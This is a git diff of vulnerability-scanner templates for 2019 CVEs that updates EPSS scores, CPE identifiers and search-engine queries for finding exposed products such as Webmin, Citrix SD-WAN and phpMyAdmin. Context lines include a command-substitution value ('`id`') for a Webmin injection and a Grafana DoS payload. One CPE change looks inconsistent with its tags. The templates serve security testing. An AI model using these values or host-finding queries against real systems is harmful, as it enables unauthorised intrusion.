94189434f2..4a739d8006 100644 --- a/http/cves/2019/CVE-2019-10405.yaml +++ b/http/cves/2019/CVE-2019-10405.yaml @@ -27,6 +27,7 @@ info: vendor: jenkins product: jenkins shodan-query: http.favicon.hash:81586312 + fofa-query: icon_hash=81586312 tags: cve,cve2019,jenkins http: diff --git a/http/cves/2019/CVE-2019-10475.yaml b/http/cves/2019/CVE-2019-10475.yaml index 380740a888..e665e9a158 100644 --- a/http/cves/2019/CVE-2019-10475.yaml +++ b/http/cves/2019/CVE-2019-10475.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2019-10475 cwe-id: CWE-79 - epss-score: 0.97301 - epss-percentile: 0.99859 + epss-score: 0.97319 + epss-percentile: 0.99877 cpe: cpe:2.3:a:jenkins:build-metrics:*:*:*:*:*:jenkins:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-10692.yaml b/http/cves/2019/CVE-2019-10692.yaml index a15f0cd07d..ef67bb90de 100644 --- a/http/cves/2019/CVE-2019-10692.yaml +++ b/http/cves/2019/CVE-2019-10692.yaml @@ -15,13 +15,14 @@ info: - https://wordpress.org/plugins/wp-google-maps/#developers - https://plugins.trac.wordpress.org/changeset?old_path=%2Fwp-google-maps&old=2061433&new_path=%2Fwp-google-maps&new=2061434&sfp_email=&sfph_mail=#file755 - https://nvd.nist.gov/vuln/detail/CVE-2019-10692 + - https://github.com/VTFoundation/vulnerablewp classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-10692 cwe-id: CWE-89 - epss-score: 0.9737 - epss-percentile: 0.99889 + epss-score: 0.97291 + epss-percentile: 0.99864 cpe: cpe:2.3:a:codecabin:wp_go_maps:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-10717.yaml b/http/cves/2019/CVE-2019-10717.yaml index a69c522e03..e65cb1cb15 100644 --- a/http/cves/2019/CVE-2019-10717.yaml +++ b/http/cves/2019/CVE-2019-10717.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.1 cve-id: CVE-2019-10717 cwe-id: CWE-22 - epss-score: 0.00409 - epss-percentile: 0.712 + epss-score: 0.00351 + epss-percentile: 0.71813 cpe: cpe:2.3:a:dotnetblogengine:blogengine.net:3.3.7.0:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: dotnetblogengine product: blogengine.net shodan-query: http.html:"Blogengine.net" + fofa-query: body="blogengine.net" tags: cve,cve2019,seclists,blogengine,lfi,traversal,dotnetblogengine http: diff --git a/http/cves/2019/CVE-2019-10758.yaml b/http/cves/2019/CVE-2019-10758.yaml index 92d6c6e83f..7ce8d1d121 100644 --- a/http/cves/2019/CVE-2019-10758.yaml +++ b/http/cves/2019/CVE-2019-10758.yaml @@ -18,8 +18,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H cvss-score: 9.9 cve-id: CVE-2019-10758 - epss-score: 0.97429 - epss-percentile: 0.99934 + epss-score: 0.97459 + epss-percentile: 0.99955 cpe: cpe:2.3:a:mongo-express_project:mongo-express:*:*:*:*:*:node.js:*:* metadata: max-request: 1 @@ -27,6 +27,8 @@ info: product: mongo-express framework: node.js shodan-query: http.title:"Mongo Express" + fofa-query: title="mongo express" + google-query: intitle:"mongo express" tags: cve,cve2019,vulhub,mongo,mongo-express,kev,mongo-express_project,node.js http: diff --git a/http/cves/2019/CVE-2019-11248.yaml b/http/cves/2019/CVE-2019-11248.yaml index f09ced2a8e..e7c00106fb 100644 --- a/http/cves/2019/CVE-2019-11248.yaml +++ b/http/cves/2019/CVE-2019-11248.yaml @@ -21,13 +21,16 @@ info: cvss-score: 8.2 cve-id: CVE-2019-11248 cwe-id: CWE-862,CWE-419 - epss-score: 0.69166 - epss-percentile: 0.97712 + epss-score: 0.55625 + epss-percentile: 0.97666 cpe: cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: kubernetes product: kubernetes + shodan-query: http.title:"kubernetes web view" + fofa-query: title="kubernetes web view" + google-query: intitle:"kubernetes web view" tags: cve2019,cve,debug,kubernetes,kubelet,devops,unauth,disclosure http: diff --git a/http/cves/2019/CVE-2019-11370.yaml b/http/cves/2019/CVE-2019-11370.yaml index 0d2b1b1d75..4fd05aa3b9 100644 --- a/http/cves/2019/CVE-2019-11370.yaml +++ b/http/cves/2019/CVE-2019-11370.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5.4 cve-id: CVE-2019-11370 cwe-id: CWE-79 - epss-score: 0.1896 - epss-percentile: 0.96129 + epss-score: 0.17043 + epss-percentile: 0.96067 cpe: cpe:2.3:o:carel:pcoweb_card_firmware:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,7 @@ info: vendor: carel product: pcoweb_card_firmware shodan-query: http.html:"pCOWeb" + fofa-query: body="pcoweb" tags: cve,cve2019,pcoweb,xss,carel,edb http: diff --git a/http/cves/2019/CVE-2019-11510.yaml b/http/cves/2019/CVE-2019-11510.yaml index 8493550845..8b516e4f70 100644 --- a/http/cves/2019/CVE-2019-11510.yaml +++ b/http/cves/2019/CVE-2019-11510.yaml @@ -27,6 +27,9 @@ info: max-request: 1 vendor: ivanti product: connect_secure + shodan-query: http.html:"welcome.cgi?p=logo" + fofa-query: body="welcome.cgi?p=logo" + google-query: intitle:"ivanti connect secure" tags: packetstorm,cve,cve2019,pulsesecure,lfi,kev http: diff --git a/http/cves/2019/CVE-2019-11580.yaml b/http/cves/2019/CVE-2019-11580.yaml index 3fb5bfc10c..754a2e87d6 100644 --- a/http/cves/2019/CVE-2019-11580.yaml +++ b/http/cves/2019/CVE-2019-11580.yaml @@ -20,7 +20,7 @@ info: cvss-score: 9.8 cve-id: CVE-2019-11580 epss-score: 0.97441 - epss-percentile: 0.99943 + epss-percentile: 0.99946 cpe: cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-11581.yaml b/http/cves/2019/CVE-2019-11581.yaml index 470e0a109a..a5be14e8d9 100644 --- a/http/cves/2019/CVE-2019-11581.yaml +++ b/http/cves/2019/CVE-2019-11581.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-11581 cwe-id: CWE-74 - epss-score: 0.97379 - epss-percentile: 0.99897 + epss-score: 0.9725 + epss-percentile: 0.99846 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-11869.yaml b/http/cves/2019/CVE-2019-11869.yaml index 02d8b9f57f..b5445d9d4e 100644 --- a/http/cves/2019/CVE-2019-11869.yaml +++ b/http/cves/2019/CVE-2019-11869.yaml @@ -26,8 +26,8 @@ info: cvss-score: 6.1 cve-id: CVE-2019-11869 cwe-id: CWE-79 - epss-score: 0.00218 - epss-percentile: 0.597 + epss-score: 0.0018 + epss-percentile: 0.55101 cpe: cpe:2.3:a:yuzopro:yuzo:5.12.94:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-12276.yaml b/http/cves/2019/CVE-2019-12276.yaml index a4c64269a2..b5dc0db698 100644 --- a/http/cves/2019/CVE-2019-12276.yaml +++ b/http/cves/2019/CVE-2019-12276.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2019-12276 cwe-id: CWE-22 - epss-score: 0.96035 - epss-percentile: 0.99446 + epss-score: 0.95661 + epss-percentile: 0.99411 cpe: cpe:2.3:a:grandnode:grandnode:4.40:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-12314.yaml b/http/cves/2019/CVE-2019-12314.yaml index 4d9713fdc0..aa7c64d4e5 100644 --- a/http/cves/2019/CVE-2019-12314.yaml +++ b/http/cves/2019/CVE-2019-12314.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-12314 cwe-id: CWE-22 - epss-score: 0.18931 - epss-percentile: 0.95811 + epss-score: 0.16359 + epss-percentile: 0.95995 cpe: cpe:2.3:a:deltek:maconomy:2.2.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-12461.yaml b/http/cves/2019/CVE-2019-12461.yaml index da9fbcecdb..1700cae404 100644 --- a/http/cves/2019/CVE-2019-12461.yaml +++ b/http/cves/2019/CVE-2019-12461.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2019-12461 cwe-id: CWE-79 - epss-score: 0.00269 - epss-percentile: 0.6713 + epss-score: 0.0035 + epss-percentile: 0.71796 cpe: cpe:2.3:a:webport:web_port:1.19.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-12581.yaml b/http/cves/2019/CVE-2019-12581.yaml index 327f88b08f..f374f8f3ba 100644 --- a/http/cves/2019/CVE-2019-12581.yaml +++ b/http/cves/2019/CVE-2019-12581.yaml @@ -28,6 +28,8 @@ info: vendor: zyxel product: uag2100_firmware shodan-query: http.title:"ZyWall" + fofa-query: title="zywall" + google-query: intitle:"zywall" tags: cve,cve2019,zyxel,zywall,xss http: diff --git a/http/cves/2019/CVE-2019-12583.yaml b/http/cves/2019/CVE-2019-12583.yaml index 3f62ff75c8..f714adf68b 100644 --- a/http/cves/2019/CVE-2019-12583.yaml +++ b/http/cves/2019/CVE-2019-12583.yaml @@ -21,12 +21,15 @@ info: cve-id: CVE-2019-12583 cwe-id: CWE-425 epss-score: 0.00481 - epss-percentile: 0.75389 + epss-percentile: 0.75875 cpe: cpe:2.3:o:zyxel:uag2100_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zyxel product: uag2100_firmware + shodan-query: http.title:"zywall" + fofa-query: title="zywall" + google-query: intitle:"zywall" tags: cve,cve2019,zyxel,zywall,xss http: diff --git a/http/cves/2019/CVE-2019-12593.yaml b/http/cves/2019/CVE-2019-12593.yaml index 20ffe994cb..12f99354c1 100644 --- a/http/cves/2019/CVE-2019-12593.yaml +++ b/http/cves/2019/CVE-2019-12593.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2019-12593 cwe-id: CWE-22 - epss-score: 0.11506 - epss-percentile: 0.95118 + epss-score: 0.07016 + epss-percentile: 0.93948 cpe: cpe:2.3:a:icewarp:mail_server:*:*:*:*:*:*:*:* metadata: max-request: 2 @@ -30,6 +30,7 @@ info: product: mail_server shodan-query: title:"icewarp" google-query: Powered By IceWarp 10.4.4 + fofa-query: title="icewarp server administration" tags: cve,cve2019,packetstorm,lfi,icewarp http: diff --git a/http/cves/2019/CVE-2019-12616.yaml b/http/cves/2019/CVE-2019-12616.yaml index 1927f86d0c..0e7cd34023 100644 --- a/http/cves/2019/CVE-2019-12616.yaml +++ b/http/cves/2019/CVE-2019-12616.yaml @@ -21,12 +21,16 @@ info: cve-id: CVE-2019-12616 cwe-id: CWE-352 epss-score: 0.01696 - epss-percentile: 0.87461 + epss-percentile: 0.87724 cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: phpmyadmin product: phpmyadmin + shodan-query: http.title:"phpmyadmin" + fofa-query: title="phpmyadmin" + google-query: intitle:"phpmyadmin" + hunter-query: app.name="phpmyadmin"&&web.body="pma_servername"&&web.body="4.8.4" tags: cve2019,cve,csrf,edb,phpmyadmin http: diff --git a/http/cves/2019/CVE-2019-12725.yaml b/http/cves/2019/CVE-2019-12725.yaml index f00aaef9f4..59b7332699 100644 --- a/http/cves/2019/CVE-2019-12725.yaml +++ b/http/cves/2019/CVE-2019-12725.yaml @@ -20,12 +20,15 @@ info: cve-id: CVE-2019-12725 cwe-id: CWE-78 epss-score: 0.96341 - epss-percentile: 0.99518 + epss-percentile: 0.99549 cpe: cpe:2.3:o:zeroshell:zeroshell:3.9.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zeroshell product: zeroshell + shodan-query: http.title:"zeroshell" + fofa-query: title="zeroshell" + google-query: intitle:"zeroshell" tags: cve,cve2019,packetstorm,rce,zeroshell http: diff --git a/http/cves/2019/CVE-2019-12962.yaml b/http/cves/2019/CVE-2019-12962.yaml index 32221d9467..75449b86cc 100644 --- a/http/cves/2019/CVE-2019-12962.yaml +++ b/http/cves/2019/CVE-2019-12962.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2019-12962 cwe-id: CWE-79 - epss-score: 0.17333 - epss-percentile: 0.95984 + epss-score: 0.15911 + epss-percentile: 0.95954 cpe: cpe:2.3:a:livezilla:livezilla:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,7 @@ info: vendor: livezilla product: livezilla shodan-query: http.html:LiveZilla + fofa-query: body=livezilla tags: cve,cve2019,xss,edb,packetstorm,livezilla http: diff --git a/http/cves/2019/CVE-2019-12985.yaml b/http/cves/2019/CVE-2019-12985.yaml index 4a1d4341b4..22578c4557 100644 --- a/http/cves/2019/CVE-2019-12985.yaml +++ b/http/cves/2019/CVE-2019-12985.yaml @@ -27,6 +27,8 @@ info: vendor: citrix product: netscaler_sd-wan shodan-query: http.title:"Citrix SD-WAN" + fofa-query: title="citrix sd-wan" + google-query: intitle:"citrix sd-wan" tags: cve,cve2019,citrix,rce,unauth,oast,tenable http: diff --git a/http/cves/2019/CVE-2019-12986.yaml b/http/cves/2019/CVE-2019-12986.yaml index 2599109455..77a1e47e8d 100644 --- a/http/cves/2019/CVE-2019-12986.yaml +++ b/http/cves/2019/CVE-2019-12986.yaml @@ -19,14 +19,16 @@ info: cvss-score: 9.8 cve-id: CVE-2019-12986 cwe-id: CWE-78 - epss-score: 0.97297 - epss-percentile: 0.9985 + epss-score: 0.97203 + epss-percentile: 0.99825 cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: citrix product: netscaler_sd-wan shodan-query: http.title:"Citrix SD-WAN" + fofa-query: title="citrix sd-wan" + google-query: intitle:"citrix sd-wan" tags: cve2019,cve,unauth,oast,tenable,citrix,rce http: diff --git a/http/cves/2019/CVE-2019-12987.yaml b/http/cves/2019/CVE-2019-12987.yaml index b25abcb298..48dc6e03bb 100644 --- a/http/cves/2019/CVE-2019-12987.yaml +++ b/http/cves/2019/CVE-2019-12987.yaml @@ -19,14 +19,16 @@ info: cvss-score: 9.8 cve-id: CVE-2019-12987 cwe-id: CWE-78 - epss-score: 0.97297 - epss-percentile: 0.9985 + epss-score: 0.97203 + epss-percentile: 0.99825 cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: citrix product: netscaler_sd-wan shodan-query: http.title:"Citrix SD-WAN" + fofa-query: title="citrix sd-wan" + google-query: intitle:"citrix sd-wan" tags: cve,cve2019,citrix,rce,unauth,oast,tenable http: diff --git a/http/cves/2019/CVE-2019-12988.yaml b/http/cves/2019/CVE-2019-12988.yaml index 49902a9eb7..e963305f7b 100644 --- a/http/cves/2019/CVE-2019-12988.yaml +++ b/http/cves/2019/CVE-2019-12988.yaml @@ -27,6 +27,8 @@ info: vendor: citrix product: netscaler_sd-wan shodan-query: http.title:"Citrix SD-WAN" + fofa-query: title="citrix sd-wan" + google-query: intitle:"citrix sd-wan" tags: cve,cve2019,rce,unauth,oast,tenable,citrix http: diff --git a/http/cves/2019/CVE-2019-12990.yaml b/http/cves/2019/CVE-2019-12990.yaml index e582f7f42c..5c7074430f 100644 --- a/http/cves/2019/CVE-2019-12990.yaml +++ b/http/cves/2019/CVE-2019-12990.yaml @@ -20,14 +20,16 @@ info: cvss-score: 9.8 cve-id: CVE-2019-12990 cwe-id: CWE-22 - epss-score: 0.92152 - epss-percentile: 0.98756 + epss-score: 0.90869 + epss-percentile: 0.98831 cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: citrix product: netscaler_sd-wan shodan-query: http.title:"Citrix SD-WAN" + fofa-query: title="citrix sd-wan" + google-query: intitle:"citrix sd-wan" tags: cve,cve2019,citrix,rce,unauth,tenable,intrusive http: diff --git a/http/cves/2019/CVE-2019-13101.yaml b/http/cves/2019/CVE-2019-13101.yaml index 5dd4626056..fd706d268b 100644 --- a/http/cves/2019/CVE-2019-13101.yaml +++ b/http/cves/2019/CVE-2019-13101.yaml @@ -20,13 +20,13 @@ info: cvss-score: 9.8 cve-id: CVE-2019-13101 cwe-id: CWE-306 - epss-score: 0.0359 - epss-percentile: 0.9142 - cpe: cpe:2.3:o:dlink:dir-600m_firmware:3.02:*:*:*:*:*:*:* + epss-score: 0.06909 + epss-percentile: 0.93911 + cpe: cpe:2.3:h:dlink:dir-600m:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dlink - product: dir-600m_firmware + product: dir-600m tags: cve2019,cve,packetstorm,edb,dlink,router,iot http: diff --git a/http/cves/2019/CVE-2019-13392.yaml b/http/cves/2019/CVE-2019-13392.yaml index 771e3d709d..79bf241156 100644 --- a/http/cves/2019/CVE-2019-13392.yaml +++ b/http/cves/2019/CVE-2019-13392.yaml @@ -14,13 +14,14 @@ info: - https://mindpalette.com/tag/natemail/ - https://nvd.nist.gov/vuln/detail/CVE-2019-13392 - https://twitter.com/mindpalette + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-13392 cwe-id: CWE-79 - epss-score: 0.0014 - epss-percentile: 0.49585 + epss-score: 0.00127 + epss-percentile: 0.47442 cpe: cpe:2.3:a:mindpalette:natemail:3.0.15:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-13396.yaml b/http/cves/2019/CVE-2019-13396.yaml index d1cafa9db7..bf8dc2a8a4 100644 --- a/http/cves/2019/CVE-2019-13396.yaml +++ b/http/cves/2019/CVE-2019-13396.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5.3 cve-id: CVE-2019-13396 cwe-id: CWE-22 - epss-score: 0.02602 - epss-percentile: 0.90051 + epss-score: 0.0288 + epss-percentile: 0.9075 cpe: cpe:2.3:a:getflightpath:flightpath:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-13462.yaml b/http/cves/2019/CVE-2019-13462.yaml index e0e3d7ab2f..bfc8baf9d8 100644 --- a/http/cves/2019/CVE-2019-13462.yaml +++ b/http/cves/2019/CVE-2019-13462.yaml @@ -26,6 +26,9 @@ info: max-request: 1 vendor: lansweeper product: lansweeper + shodan-query: http.title:"lansweeper - login" + fofa-query: title="lansweeper - login" + google-query: intitle:"lansweeper - login" tags: cve,cve2019,sqli,lansweeper http: diff --git a/http/cves/2019/CVE-2019-14205.yaml b/http/cves/2019/CVE-2019-14205.yaml index 08021f5efb..ca9333990a 100644 --- a/http/cves/2019/CVE-2019-14205.yaml +++ b/http/cves/2019/CVE-2019-14205.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2019-14205 cwe-id: CWE-22 epss-score: 0.06233 - epss-percentile: 0.93435 + epss-percentile: 0.93579 cpe: cpe:2.3:a:nevma:adaptive_images:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-14223.yaml b/http/cves/2019/CVE-2019-14223.yaml index bc8da14282..841dd84ca3 100644 --- a/http/cves/2019/CVE-2019-14223.yaml +++ b/http/cves/2019/CVE-2019-14223.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2019-14223 cwe-id: CWE-601 - epss-score: 0.00188 - epss-percentile: 0.56356 + epss-score: 0.00205 + epss-percentile: 0.58403 cpe: cpe:2.3:a:alfresco:alfresco:*:*:*:*:community:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-14251.yaml b/http/cves/2019/CVE-2019-14251.yaml index 6f45634cfd..2220dd470f 100644 --- a/http/cves/2019/CVE-2019-14251.yaml +++ b/http/cves/2019/CVE-2019-14251.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2019-14251 cwe-id: CWE-22 - epss-score: 0.01653 - epss-percentile: 0.87315 + epss-score: 0.02152 + epss-percentile: 0.89306 cpe: cpe:2.3:a:temenos:t24:r15.01:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-14312.yaml b/http/cves/2019/CVE-2019-14312.yaml index 08b0349f1c..3859d0338b 100644 --- a/http/cves/2019/CVE-2019-14312.yaml +++ b/http/cves/2019/CVE-2019-14312.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.5 cve-id: CVE-2019-14312 cwe-id: CWE-22 - epss-score: 0.02354 - epss-percentile: 0.89553 + epss-score: 0.02466 + epss-percentile: 0.90034 cpe: cpe:2.3:a:aptana:jaxer:1.0.3.4547:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-14322.yaml b/http/cves/2019/CVE-2019-14322.yaml index 8e6f97ac13..82691a077a 100644 --- a/http/cves/2019/CVE-2019-14322.yaml +++ b/http/cves/2019/CVE-2019-14322.yaml @@ -21,13 +21,14 @@ info: cvss-score: 7.5 cve-id: CVE-2019-14322 cwe-id: CWE-22 - epss-score: 0.65161 - epss-percentile: 0.97821 - cpe: cpe:2.3:a:palletsprojects:werkzeug:*:*:*:*:*:*:*:* + epss-score: 0.64382 + epss-percentile: 0.97881 + cpe: cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* metadata: max-request: 3 - vendor: palletsprojects - product: werkzeug + vendor: microsoft + product: windows + shodan-query: cpe:"cpe:2.3:o:microsoft:windows" tags: cve,cve2019,lfi,odoo,packetstorm,palletsprojects http: diff --git a/http/cves/2019/CVE-2019-14530.yaml b/http/cves/2019/CVE-2019-14530.yaml index 0c41cb85cf..f73c464c93 100644 --- a/http/cves/2019/CVE-2019-14530.yaml +++ b/http/cves/2019/CVE-2019-14530.yaml @@ -21,14 +21,17 @@ info: cvss-score: 8.8 cve-id: CVE-2019-14530 cwe-id: CWE-22 - epss-score: 0.81752 - epss-percentile: 0.98283 + epss-score: 0.80535 + epss-percentile: 0.98316 cpe: cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: open-emr product: openemr + fofa-query: icon_hash=1971268439 + shodan-query: http.html:"openemr" + google-query: intitle:"openemr" tags: cve2019,cve,lfi,authenticated,edb,openemr,open-emr http: diff --git a/http/cves/2019/CVE-2019-14696.yaml b/http/cves/2019/CVE-2019-14696.yaml index 9e0ed0b297..e8850b212d 100644 --- a/http/cves/2019/CVE-2019-14696.yaml +++ b/http/cves/2019/CVE-2019-14696.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-14696 cwe-id: CWE-79 epss-score: 0.00618 - epss-percentile: 0.78345 + epss-percentile: 0.78754 cpe: cpe:2.3:a:open-school:open-school:2.3:*:*:*:community:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-14750.yaml b/http/cves/2019/CVE-2019-14750.yaml index 38dda391f5..8fec196e82 100644 --- a/http/cves/2019/CVE-2019-14750.yaml +++ b/http/cves/2019/CVE-2019-14750.yaml @@ -21,14 +21,16 @@ info: cvss-score: 6.1 cve-id: CVE-2019-14750 cwe-id: CWE-79 - epss-score: 0.05107 - epss-percentile: 0.92161 + epss-score: 0.04425 + epss-percentile: 0.92392 cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:* metadata: max-request: 4 vendor: osticket product: osticket shodan-query: title:"osTicket" + fofa-query: title="osticket" + google-query: intitle:"osticket" tags: cve,cve2019,packetstorm,osticket,xss,intrusive variables: user_name: "{{to_lower(rand_text_alphanumeric(6))}}" diff --git a/http/cves/2019/CVE-2019-14789.yaml b/http/cves/2019/CVE-2019-14789.yaml index 66a4abe1ab..08e26250cf 100644 --- a/http/cves/2019/CVE-2019-14789.yaml +++ b/http/cves/2019/CVE-2019-14789.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-14789 cwe-id: CWE-79 epss-score: 0.00125 - epss-percentile: 0.46015 + epss-percentile: 0.46981 cpe: cpe:2.3:a:kunalnagar:custom_404_pro:3.2.8:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-14974.yaml b/http/cves/2019/CVE-2019-14974.yaml index 68f14ab6ba..faed20e703 100644 --- a/http/cves/2019/CVE-2019-14974.yaml +++ b/http/cves/2019/CVE-2019-14974.yaml @@ -27,6 +27,9 @@ info: max-request: 1 vendor: sugarcrm product: sugarcrm + shodan-query: http.html:"sugarcrm inc. all rights reserved" + google-query: intitle:sugarcrm + fofa-query: body="sugarcrm inc. all rights reserved" tags: cve,cve2019,xss,sugarcrm,edb http: diff --git a/http/cves/2019/CVE-2019-15043.yaml b/http/cves/2019/CVE-2019-15043.yaml index 8bc0934895..a61ed1018a 100644 --- a/http/cves/2019/CVE-2019-15043.yaml +++ b/http/cves/2019/CVE-2019-15043.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2019-15043 cwe-id: CWE-306 - epss-score: 0.19454 - epss-percentile: 0.95868 + epss-score: 0.28071 + epss-percentile: 0.96836 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: grafana product: grafana shodan-query: title:"Grafana" + fofa-query: title="grafana" + google-query: intitle:"grafana" tags: cve,cve2019,grafana,dos,intrusive variables: payload: '{{repeat("A", 4000)}}' diff --git a/http/cves/2019/CVE-2019-15107.yaml b/http/cves/2019/CVE-2019-15107.yaml index 7df1567ee3..7efed427ef 100644 --- a/http/cves/2019/CVE-2019-15107.yaml +++ b/http/cves/2019/CVE-2019-15107.yaml @@ -27,6 +27,9 @@ info: max-request: 1 vendor: webmin product: webmin + shodan-query: http.title:"webmin" + fofa-query: title="webmin" + google-query: intitle:"webmin" tags: cve,cve2019,packetstorm,webmin,rce,kev,edb http: diff --git a/http/cves/2019/CVE-2019-15501.yaml b/http/cves/2019/CVE-2019-15501.yaml index 4a25a49c3e..ccd1096340 100644 --- a/http/cves/2019/CVE-2019-15501.yaml +++ b/http/cves/2019/CVE-2019-15501.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-15501 cwe-id: CWE-79 epss-score: 0.00303 - epss-percentile: 0.69072 + epss-percentile: 0.69634 cpe: cpe:2.3:a:lsoft:listserv:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,7 @@ info: vendor: lsoft product: listserv shodan-query: http.html:"LISTSERV" + fofa-query: body="listserv" tags: cve2019,cve,xss,listserv,edb,lsoft http: diff --git a/http/cves/2019/CVE-2019-15642.yaml b/http/cves/2019/CVE-2019-15642.yaml index 092de77f40..925da743ae 100644 --- a/http/cves/2019/CVE-2019-15642.yaml +++ b/http/cves/2019/CVE-2019-15642.yaml @@ -30,6 +30,8 @@ info: vendor: webmin product: webmin shodan-query: title:"Webmin" + fofa-query: title="webmin" + google-query: intitle:"webmin" tags: cve,cve2019,webmin,rce variables: cmd: '`id`' diff --git a/http/cves/2019/CVE-2019-15713.yaml b/http/cves/2019/CVE-2019-15713.yaml index fc1dc3ea2d..1acb34a7ea 100644 --- a/http/cves/2019/CVE-2019-15713.yaml +++ b/http/cves/2019/CVE-2019-15713.yaml @@ -26,8 +26,8 @@ info: vendor: my_calendar_project product: my_calendar framework: wordpress + fofa-query: '"wordpress" && body="wp-content/plugins/my-calendar"' tags: cve,cve2019,wordpress,xss,wp-plugin,wpscan,my_calendar_project - flow: http(1) && http(2) http: diff --git a/http/cves/2019/CVE-2019-15829.yaml b/http/cves/2019/CVE-2019-15829.yaml index fd23065c70..144637db9b 100644 --- a/http/cves/2019/CVE-2019-15829.yaml +++ b/http/cves/2019/CVE-2019-15829.yaml @@ -28,6 +28,8 @@ info: product: gallery_photoblocks framework: wordpress publicwww-query: "/wp-content/plugins/photoblocks-grid-gallery/" + shodan-query: http.html:/wp-content/plugins/photoblocks-grid-gallery/ + fofa-query: body=/wp-content/plugins/photoblocks-grid-gallery/ tags: cve,cve2019,wp,wordpress,wp-plugin,photoblocks-gallery,xss,authenticated,wpscan,greentreelabs http: diff --git a/http/cves/2019/CVE-2019-15858.yaml b/http/cves/2019/CVE-2019-15858.yaml index b2aa43d1ab..fa7f1d7ba5 100644 --- a/http/cves/2019/CVE-2019-15858.yaml +++ b/http/cves/2019/CVE-2019-15858.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2019-15858 cwe-id: CWE-306 - epss-score: 0.036 - epss-percentile: 0.91432 + epss-score: 0.02804 + epss-percentile: 0.90638 cpe: cpe:2.3:a:webcraftic:woody_ad_snippets:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-15889.yaml b/http/cves/2019/CVE-2019-15889.yaml index c4b5e7f4dd..5717c86fcc 100644 --- a/http/cves/2019/CVE-2019-15889.yaml +++ b/http/cves/2019/CVE-2019-15889.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2019-15889 cwe-id: CWE-79 - epss-score: 0.03568 - epss-percentile: 0.90679 + epss-score: 0.03259 + epss-percentile: 0.91254 cpe: cpe:2.3:a:wpdownloadmanager:wordpress_download_manager:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -29,7 +29,6 @@ info: product: wordpress_download_manager framework: wordpress tags: 